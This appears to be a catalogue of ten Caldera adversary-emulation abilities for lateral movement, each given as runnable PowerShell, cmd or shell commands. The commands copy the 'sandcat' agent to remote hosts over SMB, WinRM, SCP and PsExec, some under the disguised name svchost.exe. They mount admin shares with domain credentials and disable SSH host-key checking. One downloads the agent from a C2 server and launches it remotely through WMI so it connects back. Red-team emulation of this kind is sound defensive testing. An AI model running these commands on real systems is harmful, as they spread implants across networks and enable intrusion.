Caldera emulation abilities
10 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
Abilities
Copy 54ndc47 (SMB)
Copy 54ndc47 to remote host (SMB)
[{"platform": "windows", "executor": "psh", "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n"}]
Copy 54ndc47 (WinRM and SCP)
Copy 54ndc47 to remote host (PowerShell 5 or newer only) or SCP
[{"platform": "windows", "executor": "psh,pwsh", "command": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n"}, {"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n"}]
Copy Sandcat File using Powershell
Copy Sandcat file using PowerShell
[{"platform": "windows", "executor": "psh", "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n"}]
Copy Sandcat File using PsExec on CMD
Copy Sandcat file using PsExec on CMD
[{"platform": "windows", "executor": "cmd", "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n"}]
lateral-movement
[]
Lateral Movement - Certutil
Uses CertUtil as a LoL technique to move the .exe agent as a certificate using Windows-signed binaries
[]
lateral-movement
[]
Lateral Movement - esentutl
Tool transfer to lateral hosts using Alternate Data Streams to hide implant
[]
Mount Share
Mount a Windows share
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n"}]
Net use
Mounts a network file share on a target computer
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n"}]
Start 54ndc47
Copy 54ndc47 to remote host and start it; assumes the target uses SSH keys and passwordless authentication
[{"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}]
Start Agent (WinRM)
Start Agent using WinRM (WinRM)
[{"platform": "windows", "executor": "psh", "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n"}]